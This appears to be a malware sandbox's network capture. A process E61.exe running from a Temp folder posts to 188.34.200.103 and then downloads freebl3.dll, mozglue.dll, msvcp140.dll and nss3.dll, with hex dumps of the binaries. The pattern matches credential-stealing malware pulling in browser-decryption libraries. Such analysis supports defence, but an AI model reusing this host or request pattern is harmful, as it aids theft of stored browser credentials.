Aug 24, 2021 08:49:20.996589899 CEST	10755	IN	Data Raw: ef 00 00 06 2d 03 16 2b 01 17 28 a2 00 00 0a 13 06 16 13 07 2b 56 11 06 11 07 9a 13 08 06 11 08 6f 25 00 00 0a 73 92 01 00 06 25 09 11 05 11 08 6f f4 00 00 06 6f 9c 01 00 06 25 09 6f f2 00 00 06 28 3b 00 00 0a 2d 08 09 6f f2 00 00 06 2b 07 11 05 Data Ascii: -+(+Vo%s%oo%o(;-o+ooo&Xi2&o:\,o&Xi?&&*@aF. 0
Aug 24, 2021 08:49:20.996897936 CEST	10757	IN	Data Raw: 11 11 6f aa 00 00 0a 16 6a 3e 86 00 00 00 11 11 6f aa 00 00 0a 11 08 30 7b 07 20 00 00 20 03 6a 2f 72 11 11 6f 24 00 00 0a 6f 25 00 00 0a 17 8d 51 00 00 01 25 16 18 8d 52 00 00 01 25 16 1f 3a 9d 25 17 1f 5c 9d 73 1f 00 00 0a a2 17 6f 4e 00 00 0a Data Ascii: oj>o0{ j/ro$o%Q%R%:%\soNo%s%,i0~"+o%oooX&o:I,o&o:D,o&*A

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49718	188.34.200.103	80	C:\Users\user\AppData\Local\Temp\E61.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 08:49:22.260518074 CEST	11954	OUT	POST /824 HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 188.34.200.103 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Aug 24, 2021 08:49:22.374872923 CEST	12175	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 3d 8c c1 0e c2 20 0c 86 9f 66 17 62 08 cc 78 81 a3 7a f2 30 13 e7 cd 4b 05 9c cb 20 10 28 ce bd bd 8c 25 f6 4f fa 7d 4d da f2 1d ff 87 95 ac 6c 0f 85 6b c9 e6 74 be 5d fa ee da 3c 24 a1 f8 45 41 a8 86 d2 67 b0 d6 20 a1 44 90 f6 05 95 4f 50 53 0e 55 95 d7 a6 4a 80 94 66 1f 75 1d 20 e3 bb ca e0 fd 60 b7 85 8c aa f2 de 1f b7 cb b8 84 ed ed 64 96 42 c9 19 93 18 b3 91 ce 7f 46 93 84 cb 69 54 c2 85 bd fc 01 a5 24 5a 32 b9 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 99= fbxz0K (%O}Mlkt]<$EAg DOPSUJfu `dBFiT$Z20
Aug 24, 2021 08:49:22.380033016 CEST	12176	OUT	GET /freebl3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:49:22.400402069 CEST	12177	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:22 GMT Content-Type: application/x-msdos-program Content-Length: 334288 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "519d0-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:49:22 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
Aug 24, 2021 08:49:22.400501013 CEST	12179	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 3f 01 00 00 e8 23 c9 03 00 59 85 c0 75 0e 68 13 e0 ff ff e8 Data Ascii: h?#Yuh&Y3(UVt-jujuuuVzt(Y3^]U0SVW}EuGE9Esho}Y
Aug 24, 2021 08:49:22.400518894 CEST	12180	IN	Data Raw: 41 ff 88 42 03 84 c9 75 1c 8a 4a 02 8d 41 ff 88 42 02 84 c9 75 0f 8a 4a 01 8d 41 ff 88 42 01 84 c9 75 02 fe 0a 5d c3 68 90 00 00 00 e8 ff c3 03 00 59 c3 55 8b ec 56 68 90 00 00 00 e8 ef c3 03 00 8b f0 59 85 f6 74 2a 6a 00 ff 75 18 ff 75 14 ff 75 Data Ascii: ABuJABuJABu]hYUVhYt*juuuuuVtjVWYY3^]US]3t9thY)9]shESuuPuM[]U}t!hjuO}tuHY]U
Aug 24, 2021 08:49:22.400538921 CEST	12181	IN	Data Raw: 3c 73 8b 75 08 66 8b 5d f4 66 89 7d ec 66 c1 cf 05 66 2b 0c 46 66 2b 1c 56 8b 45 ec 83 e0 3f 66 89 4d f8 8b 55 f8 66 89 4d 12 66 8b 4d f0 66 2b 0c 46 66 89 4d f0 8b 75 f0 66 89 4d fe 66 89 5d f4 8b 4d f4 8b c1 f7 d0 66 c1 cb 03 23 c6 23 ca 66 2b Data Ascii: <suf]f}ff+Ff+VE?fMUfMfMf+FfMufMf]Mf##f+Ef+f+xV#Mf+#Ef+fUff+XT]#f+}#f+f+SR#fU#ff+uf+f+SPfM#f#f+Uf+f+KNfM}f##f
Aug 24, 2021 08:49:22.400899887 CEST	12183	IN	Data Raw: d1 23 fb 66 8b 4d ec 23 c2 66 c1 c9 05 66 2b c8 89 55 f0 66 2b cf 8b c3 8b 7d 08 f7 d0 23 da 66 2b 4f 0e 0f b7 f1 66 8b 4d f4 23 c6 66 c1 c9 03 66 2b c8 89 75 ec 66 2b cb 66 2b 4f 0c 0f b7 f9 89 7d f4 66 8b 4d f8 8b c2 66 c1 c9 02 f7 d0 23 c7 66 Data Ascii: #fM#ff+Uf+}#f+OfM#ff+uf+f+O}fMf#f+#Uf+#f+JfM#ff+]f+f+J#fM#ff+UEf+f+HfM#f#f+}f+]f+KfM#ff+u#ff+f+K
Aug 24, 2021 08:49:22.400922060 CEST	12184	IN	Data Raw: 55 f8 8b ca f7 d1 8b c2 23 4d fc 23 45 10 03 c8 8b 45 08 66 03 48 28 8b c2 66 03 ce 66 d1 c1 0f b7 f1 23 c6 89 75 f4 8b ce f7 d1 23 4d 10 03 c8 8b 45 08 66 03 48 2a 66 03 cf 66 c1 c1 02 0f b7 f9 8b cf 89 7d fc f7 d1 8b c7 23 ca 23 c6 03 c8 8b 45 Data Ascii: U#M#EEfH(ff#u#MEfH*ff}##EfH,f]fU##fK.fMfu##fK0fMf}##fK2fMfU##fK4fMfu##fK6fMf
Aug 24, 2021 08:49:22.400960922 CEST	12186	IN	Data Raw: c1 02 0f b7 d1 8b ca 89 55 fc f7 d1 8b c2 23 ce 23 c7 03 c8 66 03 4b 7c 66 03 4d 10 66 c1 c1 03 0f b7 c1 8b c8 89 45 10 f7 d1 23 c2 23 cf 03 c8 66 03 4b 7e 66 03 ce 66 c1 c1 05 0f b7 c1 8b 4d 0c 89 45 f8 66 8b c7 5f 5e 66 89 01 66 8b c2 66 89 41 Data Ascii: U##fK\|fMfE##fK~ffMEf_^fffAfEfAfEfA[]UQQVuEMSW}XW+NUFfDfEfBfEffEfBfE1E1EEPPQ:MEUEfE
Aug 24, 2021 08:49:22.400980949 CEST	12187	IN	Data Raw: 53 8b 5d 10 89 95 f4 fe ff ff 57 8b 7d 08 89 bd f8 fe ff ff 85 db 0f 84 a1 00 00 00 b8 00 01 00 00 3b d8 0f 83 94 00 00 00 85 ff 75 0a 68 05 e0 ff ff e9 8b 00 00 00 56 be 60 f2 03 10 6a 40 59 f3 a5 8d b5 fc fe ff ff 8b f8 3b d8 73 19 53 52 56 e8 Data Ascii: S]W};uhV`j@Y;sSRV+;wWRV2+8Guf3^hYYM_3[]USVuW}
Aug 24, 2021 08:49:22.400994062 CEST	12188	IN	Data Raw: 0f b6 04 08 c1 e0 10 0b f0 8a 45 ff fe c7 0f b6 d7 8a 1c 0a 02 c3 88 45 ff 0f b6 c0 8a 0c 08 88 0c 3a 8b d7 8b 7d 1c 02 cb 83 ef 04 89 7d 1c 88 1c 10 0f b6 c1 8b 4d 14 0f b6 04 10 c1 e0 18 0b c6 8b f2 33 45 0c 8b 55 f8 89 01 83 c1 04 83 6d 18 01 Data Ascii: EE:}}M3EUmM}mE3_^[]Ujjj@u]Uhju"}tuY]UVuW}j@X;G}9r}FP
Aug 24, 2021 08:49:22.401010990 CEST	12190	IN	Data Raw: 51 81 f7 d1 82 e6 ad 03 c6 89 85 cc fe ff ff 13 cf 33 85 1c ff ff ff 8b d9 89 8d c8 fe ff ff 33 9d 20 ff ff ff 8b d0 8b 4d 84 0f ac da 18 0f ac c3 18 8b 45 88 03 ca 13 c3 01 8d e0 fe ff ff 8b 8d f0 fe ff ff 13 c8 8b 85 e0 fe ff ff 33 c6 89 8d f0 Data Ascii: Q33 ME33x\|33EM$(3D3
Aug 24, 2021 08:49:22.421052933 CEST	12191	IN	Data Raw: bd 80 fe ff ff 8b c8 0f ac d1 1f 0f ac c2 1f 8b 45 e0 89 8d 70 fe ff ff 8b 4d dc 03 cb 89 95 8c fe ff ff 8b 95 f4 fe ff ff 13 c7 03 d1 8b 8d d4 fe ff ff 8b f2 13 c8 89 95 f4 fe ff ff 33 b5 88 fe ff ff 8b d1 33 95 98 fe ff ff 8b 85 c8 fe ff ff 89 Data Ascii: EpM333M3E33M33
Aug 24, 2021 08:49:22.848834038 CEST	12525	OUT	GET /mozglue.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:49:22.869708061 CEST	12527	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:22 GMT Content-Type: application/x-msdos-program Content-Length: 137168 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "217d0-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:49:22 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
Aug 24, 2021 08:49:23.063957930 CEST	12668	OUT	GET /msvcp140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:49:23.085283041 CEST	12669	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:23 GMT Content-Type: application/x-msdos-program Content-Length: 440120 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "6b738-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:49:23 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
Aug 24, 2021 08:49:23.821121931 CEST	13124	OUT	GET /nss3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:49:23.841662884 CEST	13126	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:23 GMT Content-Type: application/x-msdos-program Content-Length: 1246160 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "1303d0-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:49:23 GMT Cache-Control: max-age=86400 X-Cache-Status: HIT X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 